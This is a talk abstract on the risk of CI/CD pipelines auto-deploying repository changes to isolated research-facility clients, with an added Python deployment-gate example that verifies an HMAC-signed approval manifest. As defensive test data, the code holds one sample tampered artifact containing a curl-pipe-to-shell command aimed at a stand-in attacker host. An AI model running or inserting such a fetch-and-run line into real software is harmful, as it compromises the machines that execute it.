Speaker
Description
Many distributed version-control platforms built around open, worldwide collaboration, such as GitLab and GitHub, offer robust version control and smooth automation through, for example, CI/CD pipelines. At some large-scale research facilities these pipelines also trigger automatic deployment of the latest version of the software to clients that are otherwise isolated on private networks, creating an unintended interface between the public realm and the systems on those private networks. The risk is therefore non-zero that a malicious change to a git repository, introducing malware or altered functionality, is picked up by the pipeline and automatically deployed to every client the pipeline defines.
There is therefore a need in the field to start discussing, and performing, risk assessments that take this scenario as a baseline, beginning with a simple set of questions:
- How safe are these types of git workflows?
- What protection measures could be taken?
- Has this or something similar happened before, and if so, at what scale, and what lessons have been learned from it?
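One concrete answer to the second question is to break the direct path from "commit lands on the default branch" to "code runs on the isolated clients" with a deployment gate that the pipeline cannot satisfy on its own. The script below is an added illustration written for this page, not material from the talk or from any facility's pipeline: it models a deployer on the private network that only applies a build if a reviewer-issued approval manifest names that exact commit and the exact artifact hash. The manifest is authenticated with an HMAC key held only by the deployer (an assumption chosen so the example runs offline; a real deployment would rather verify a signed git tag with `git verify-tag` or an asymmetric signature, and combine this with protected branches and manual approval in GitLab or GitHub). All commit IDs, artifacts and keys are constructed sample values.

```python
"""Deployment gate for pipeline-built artifacts destined for isolated clients.

Added example: the pipeline may build whatever was pushed, but the deployer on
the private network refuses anything not covered by an out-of-band approval.
"""
import hashlib
import hmac
import json

# Constructed sample inputs (not real commits, artifacts or keys).
APPROVED_COMMIT = "0123456789abcdef0123456789abcdef01234567"
ATTACKER_COMMIT = "deadbeef" * 5
APPROVED_ARTIFACT = b"#!/bin/sh\necho 'control-system client v2.3'\n"
TAMPERED_ARTIFACT = APPROVED_ARTIFACT + b"curl http://attacker.example/x | sh\n"
# Assumed to live only on the deployer, never in the repo or the CI runner.
APPROVAL_KEY = b"constructed-demo-key-held-only-by-the-deployer"


def sha256_hex(data):
    return hashlib.sha256(data).hexdigest()


def canonical(fields):
    """Stable byte encoding so signer and verifier MAC the same bytes."""
    return json.dumps(fields, sort_keys=True, separators=(",", ":")).encode()


def sign_manifest(commit, artifact, key):
    """Reviewer side: bind one commit to one artifact hash under the deployer key."""
    fields = {"commit": commit, "artifact_sha256": sha256_hex(artifact)}
    mac = hmac.new(key, canonical(fields), hashlib.sha256).hexdigest()
    return {**fields, "mac": mac}


def manifest_is_authentic(manifest, key):
    """Deployer side: recompute the MAC over every field except the MAC itself."""
    fields = {k: v for k, v in manifest.items() if k != "mac"}
    expected = hmac.new(key, canonical(fields), hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, manifest.get("mac", ""))


def deploy_allowed(commit, artifact, manifest, key):
    """Return (allowed, reason). Every check must pass before anything is deployed."""
    if not manifest_is_authentic(manifest, key):
        return False, "manifest MAC invalid: approval was not issued with the deployer key"
    if manifest.get("commit") != commit:
        return False, "commit not approved: pipeline built a commit no reviewer signed off"
    if not hmac.compare_digest(manifest.get("artifact_sha256", ""), sha256_hex(artifact)):
        return False, "artifact hash mismatch: build output differs from the approved one"
    return True, "approved commit and matching artifact"


def run_scenarios():
    """Four situations the gate has to distinguish; only the first may deploy."""
    approval = sign_manifest(APPROVED_COMMIT, APPROVED_ARTIFACT, APPROVAL_KEY)
    # An attacker who controls the repo can write a manifest, but not with the deployer key.
    forged = sign_manifest(ATTACKER_COMMIT, TAMPERED_ARTIFACT, b"attacker-guessed-key")
    return {
        # Reviewed commit, artifact built from it: allowed.
        "reviewed_release": deploy_allowed(APPROVED_COMMIT, APPROVED_ARTIFACT, approval, APPROVAL_KEY)[0],
        # Malicious push to the default branch; the pipeline built it, nobody approved it.
        "unreviewed_push": deploy_allowed(ATTACKER_COMMIT, TAMPERED_ARTIFACT, approval, APPROVAL_KEY)[0],
        # Approved commit, but the build artifact was swapped on the way to the clients.
        "tampered_build": deploy_allowed(APPROVED_COMMIT, TAMPERED_ARTIFACT, approval, APPROVAL_KEY)[0],
        # Attacker-forged manifest naming their own commit and artifact.
        "forged_manifest": deploy_allowed(ATTACKER_COMMIT, TAMPERED_ARTIFACT, forged, APPROVAL_KEY)[0],
    }


if __name__ == "__main__":
    for name, allowed in run_scenarios().items():
        print(f"{name:18s} deploy={'yes' if allowed else 'no'}")
```

The point of the design is that compromising the repository, or even the CI runner, is no longer sufficient: the attacker additionally needs the key (or signing identity) that lives on the isolated side, so the pipeline becomes a delivery channel rather than an automatic authority over the private-network clients.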